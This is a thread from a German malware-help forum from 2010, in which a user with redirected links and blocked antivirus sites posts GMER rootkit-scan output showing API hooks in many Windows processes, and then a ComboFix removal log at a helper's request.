.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\services.exe[820] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\services.exe[820] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\services.exe[820] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\lsass.exe[832] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\lsass.exe[832] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\lsass.exe[832] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\svchost.exe[1000] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\svchost.exe[1000] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\svchost.exe[1000] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\ctfmon.exe[1036] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\ctfmon.exe[1036] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\ctfmon.exe[1036] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\System32\svchost.exe[1116] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\System32\svchost.exe[1116] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\System32\svchost.exe[1116] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 100A3DF4
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 100A3C3C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 100A3E78
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!connect 71A14A07 5 Bytes JMP 100A3AF0
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!send 71A14C27 5 Bytes JMP 100A3264
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100A27F8
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!recv 71A1676F 5 Bytes JMP 100A278C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 100A3A9C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Messenger\msmsgs.exe[1300] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Messenger\msmsgs.exe[1300] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Messenger\msmsgs.exe[1300] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\spoolsv.exe[1696] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\spoolsv.exe[1696] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\spoolsv.exe[1696] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!SetUnhandledExceptionFilter 7C84495D 4 Bytes [C2, 04, 00, 00]
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10143DF4
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10143C3C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10143E78
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10143AF0
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!send 71A14C27 5 Bytes JMP 10143264
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 101427F8
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1014278C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10143A9C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\taskmgr.exe[3192] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\taskmgr.exe[3192] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\taskmgr.exe[3192] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
---- Devices - GMER 1.0.15 ----
AttachedDevice \FileSystem\Ntfs \Ntfs eamon.sys (Amon monitor/ESET)
AttachedDevice \FileSystem\Ntfs \Ntfs InCDrec.SYS (InCD File System Recognizer/Nero AG)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.)
AttachedDevice \Driver\Tcpip \Device\Tcp epfwtdir.sys (ESET Antivirus Network Redirector/ESET)
AttachedDevice \FileSystem\Fastfat \Fat eamon.sys (Amon monitor/ESET)
---- EOF - GMER 1.0.15 ----
sejott |
|
25.06.2010, 21:28
| #2 |
| /// Malware-holic   | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt bitte erstelle und poste ein combofix log.
__________________Ein Leitfaden und Tutorium zur Nutzung von ComboFix |
|
26.06.2010, 01:57
| #3 |
| | Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt Hallo Markusg,
__________________danke für die Hilfe. ComboFix hat funktioniert, ein paar Sachen gelöscht und neu gebootet. Hier der Log: Code:
ATTFilter ComboFix 10-06-25.01 - *** 25.06.2010 23:48:59.1.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.49.1031.18.1014.565 [GMT 2:00]
ausgeführt von:: c:\dokumente und einstellungen\***\Desktop\ComboFix.exe
AV: ESET NOD32 Antivirus 4.2 *On-access scanning disabled* (Outdated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
.
(((((((((((((((((((((((((((((((((((( Weitere Löschungen ))))))))))))))))))))))))))))))))))))))))))))))))
.
c:\dokume~1\***\LOKALE~1\Temp\org.bak
c:\dokumente und einstellungen\***\Lokale Einstellungen\Temp\org.bak
c:\windows\system32\1.tmp
c:\windows\system32\csftxctl.ocx
c:\windows\system32\win.ini
.
((((((((((((((((((((((( Dateien erstellt von 2010-05-25 bis 2010-06-25 ))))))))))))))))))))))))))))))
.
2010-06-25 21:58 . 2010-06-25 21:58 -------- d-----w- c:\windows\system32\xircom
2010-06-25 21:58 . 2010-06-25 21:58 -------- d-----w- c:\windows\system32\wbem\snmp
2010-06-25 21:58 . 2010-06-25 21:58 -------- d-----w- c:\programme\microsoft frontpage
2010-06-20 19:01 . 2010-06-20 19:01 -------- d-----w- c:\dokumente und einstellungen\***\Anwendungsdaten\Malwarebytes
2010-06-20 19:01 . 2010-04-29 10:19 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2010-06-20 19:01 . 2010-06-20 19:01 -------- d-----w- c:\dokumente und einstellungen\All Users\Anwendungsdaten\Malwarebytes
2010-06-20 19:01 . 2010-04-29 10:19 20952 ----a-w- c:\windows\system32\drivers\mbam.sys
2010-06-20 19:01 . 2010-06-20 22:55 -------- d-----w- c:\programme\Malwarebytes' Anti-Malware
2010-06-20 18:44 . 2010-06-20 18:44 77312 ----a-w- C:\mbr.exe
2010-06-19 18:33 . 2010-06-19 18:33 -------- d-----w- c:\programme\Sophos
2010-06-18 11:17 . 2010-06-18 11:17 -------- d-----w- c:\programme\Trend Micro
2010-06-15 00:28 . 2010-06-15 01:02 -------- d---a-w- C:\Kaspersky Rescue Disk 10.0
2010-06-14 14:00 . 2010-06-14 14:00 -------- d-----w- c:\dokumente und einstellungen\***\Lokale Einstellungen\Anwendungsdaten\ESET
2010-06-14 11:51 . 2010-06-14 11:51 -------- d-----w- c:\programme\ESET
2010-06-14 11:51 . 2010-06-14 11:51 -------- d-----w- c:\dokumente und einstellungen\All Users\Anwendungsdaten\ESET
2010-06-11 10:13 . 2010-04-20 05:29 285696 ------w- c:\windows\system32\dllcache\atmfd.dll
2010-06-11 10:13 . 2009-10-21 05:38 75776 ------w- c:\windows\system32\dllcache\strmfilt.dll
2010-06-11 10:13 . 2009-10-21 05:38 25088 ------w- c:\windows\system32\dllcache\httpapi.dll
2010-06-11 10:13 . 2009-10-20 16:20 265728 ------w- c:\windows\system32\dllcache\http.sys
2010-06-11 10:12 . 2010-03-05 14:37 65536 ------w- c:\windows\system32\dllcache\asycfilt.dll
2010-06-10 22:20 . 2010-06-11 10:34 -------- d-----w- C:\Meine Webseiten
2010-06-10 22:16 . 2010-06-10 22:17 -------- d-----w- c:\programme\WinHTTrack
2010-06-08 17:10 . 2010-01-29 14:59 691712 ------w- c:\windows\system32\dllcache\inetcomm.dll
2010-06-08 17:09 . 2010-03-09 11:07 430080 ------w- c:\windows\system32\dllcache\vbscript.dll
2010-06-08 17:09 . 2010-02-12 04:33 100864 ------w- c:\windows\system32\dllcache\6to4svc.dll
2010-06-08 17:09 . 2010-02-24 11:57 457216 ------w- c:\windows\system32\dllcache\mrxsmb.sys
2010-06-08 17:08 . 2009-10-23 15:28 3558912 ------w- c:\windows\system32\dllcache\moviemk.exe
2010-06-08 17:08 . 2009-12-17 07:40 346624 ------w- c:\windows\system32\dllcache\mspaint.exe
2010-06-08 17:08 . 2009-12-31 16:50 353792 ------w- c:\windows\system32\dllcache\srv.sys
2010-06-08 17:08 . 2009-11-27 16:08 8704 ------w- c:\windows\system32\dllcache\tsbyuv.dll
2010-06-08 17:08 . 2009-11-27 16:08 85504 ------w- c:\windows\system32\dllcache\avifil32.dll
2010-06-08 17:08 . 2009-11-27 16:08 48128 ------w- c:\windows\system32\dllcache\iyuv_32.dll
2010-06-08 17:08 . 2009-11-27 16:08 28672 ------w- c:\windows\system32\dllcache\msvidc32.dll
2010-06-08 17:08 . 2009-11-27 16:08 11264 ------w- c:\windows\system32\dllcache\msrle32.dll
2010-06-08 17:06 . 2009-10-15 16:28 81920 ------w- c:\windows\system32\dllcache\fontsub.dll
2010-06-08 17:06 . 2009-10-15 16:28 119808 ------w- c:\windows\system32\dllcache\t2embed.dll
2010-06-08 17:05 . 2009-11-21 15:54 471552 ------w- c:\windows\system32\dllcache\aclayers.dll
2010-06-08 17:05 . 2009-10-13 10:32 271360 ------w- c:\windows\system32\dllcache\oakley.dll
2010-06-08 17:05 . 2009-10-12 13:29 79872 ------w- c:\windows\system32\dllcache\raschap.dll
2010-06-08 17:04 . 2009-06-25 08:41 54272 ------w- c:\windows\system32\dllcache\wdigest.dll
2010-06-08 17:04 . 2009-06-25 08:41 301568 ------w- c:\windows\system32\dllcache\kerberos.dll
2010-06-08 17:04 . 2009-09-11 14:14 136704 ------w- c:\windows\system32\dllcache\msv1_0.dll
2010-06-08 17:04 . 2009-06-24 10:28 92928 ------w- c:\windows\system32\dllcache\ksecdd.sys
2010-06-08 17:03 . 2009-07-17 16:15 1441792 ------w- c:\windows\system32\dllcache\query.dll
2010-06-08 17:03 . 2009-08-26 08:00 247326 ------w- c:\windows\system32\dllcache\strmdll.dll
2010-06-08 17:03 . 2009-09-04 21:03 58880 ------w- c:\windows\system32\dllcache\msasn1.dll
2010-06-08 17:02 . 2009-08-13 15:15 512000 ------w- c:\windows\system32\dllcache\jscript.dll
2010-06-08 17:01 . 2009-06-21 21:45 153088 ------w- c:\windows\system32\dllcache\triedit.dll
2010-06-08 17:01 . 2009-06-10 06:17 134144 ------w- c:\windows\system32\dllcache\wkssvc.dll
2010-06-08 17:01 . 2009-08-05 08:59 206336 ------w- c:\windows\system32\dllcache\mswebdvd.dll
2010-06-08 17:01 . 2009-06-15 11:08 82944 ------w- c:\windows\system32\dllcache\tlntsess.exe
2010-06-08 17:01 . 2009-06-15 10:43 78848 ------w- c:\windows\system32\dllcache\telnet.exe
2010-06-08 17:01 . 2009-07-17 19:01 58880 ------w- c:\windows\system32\dllcache\atl.dll
2010-06-08 16:59 . 2009-04-15 14:51 585216 ------w- c:\windows\system32\dllcache\rpcrt4.dll
2010-06-08 16:59 . 2009-05-07 15:15 348672 ------w- c:\windows\system32\dllcache\localspl.dll
2010-06-08 16:59 . 2009-06-25 08:41 56832 ------w- c:\windows\system32\dllcache\secur32.dll
2010-06-08 16:59 . 2009-03-21 14:06 1063424 ------w- c:\windows\system32\dllcache\kernel32.dll
2010-06-08 16:59 . 2009-08-25 09:17 354816 ------w- c:\windows\system32\dllcache\winhttp.dll
2010-06-08 16:59 . 2008-06-12 14:20 956928 ------w- c:\windows\system32\dllcache\msdtctm.dll
2010-06-08 16:59 . 2008-06-12 14:20 91648 ------w- c:\windows\system32\dllcache\mtxoci.dll
2010-06-08 16:59 . 2008-06-12 14:20 66560 ------w- c:\windows\system32\dllcache\mtxclu.dll
2010-06-08 16:59 . 2008-06-12 14:20 58880 ------w- c:\windows\system32\dllcache\msdtclog.dll
2010-06-08 16:59 . 2008-06-12 14:20 161792 ------w- c:\windows\system32\dllcache\msdtcuiu.dll
2010-06-08 16:57 . 2009-06-25 08:41 147456 ------w- c:\windows\system32\dllcache\schannel.dll
2010-06-08 16:57 . 2008-10-23 12:36 286720 ------w- c:\windows\system32\dllcache\gdi32.dll
2010-06-08 16:57 . 2009-07-31 08:02 1372672 ------w- c:\windows\system32\dllcache\msxml6.dll
2010-06-08 16:56 . 2009-07-31 04:32 1172480 ------w- c:\windows\system32\dllcache\msxml3.dll
2010-06-08 16:56 . 2008-10-15 16:35 337408 ------w- c:\windows\system32\dllcache\netapi32.dll
2010-06-08 16:56 . 2008-07-07 20:26 253952 ------w- c:\windows\system32\dllcache\es.dll
2010-06-08 16:56 . 2008-06-24 16:42 74240 ------w- c:\windows\system32\dllcache\mscms.dll
2010-06-08 16:56 . 2010-02-11 12:02 226880 ------w- c:\windows\system32\dllcache\tcpip6.sys
2010-06-08 16:56 . 2008-08-14 10:04 138496 ------w- c:\windows\system32\dllcache\afd.sys
2010-06-08 16:56 . 2008-06-20 17:46 247296 ------w- c:\windows\system32\dllcache\mswsock.dll
2010-06-08 16:56 . 2008-06-20 17:46 147968 ------w- c:\windows\system32\dllcache\dnsapi.dll
2010-06-08 16:56 . 2008-06-20 11:51 361600 ------w- c:\windows\system32\dllcache\tcpip.sys
2010-06-08 16:55 . 2008-06-14 17:37 273024 ------w- c:\windows\system32\dllcache\bthport.sys
2010-06-08 16:55 . 2009-12-24 06:59 177664 ------w- c:\windows\system32\dllcache\wintrust.dll
2010-06-08 16:55 . 2010-01-13 14:00 86528 ------w- c:\windows\system32\dllcache\cabview.dll
2010-06-08 16:50 . 2003-12-14 19:51 159744 ----a-w- c:\windows\system32\igfxres.dll
2010-06-08 15:03 . 2010-06-12 01:37 -------- d-----w- c:\windows\system32\dllcache
2010-06-08 14:38 . 2007-10-29 12:00 13824 ----a-w- c:\windows\system32\irclass.dll
2010-06-08 14:38 . 2007-10-29 12:00 24661 ----a-w- c:\windows\system32\spxcoins.dll
.
(((((((((((((((((((((((((((((((((((( Find3M Bericht ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-06-24 01:20 . 2007-10-29 12:00 84908 ----a-w- c:\windows\system32\perfc007.dat
2010-06-24 01:20 . 2007-10-29 12:00 459050 ----a-w- c:\windows\system32\perfh007.dat
2010-06-23 19:00 . 2010-02-21 12:29 -------- d-----w- c:\programme\TTQV4
2010-06-20 15:19 . 2008-10-10 01:18 -------- d-----w- c:\programme\Sandboxie
2010-06-18 23:28 . 2010-01-05 13:19 -------- d-----w- c:\programme\mapedit1-0-57-3
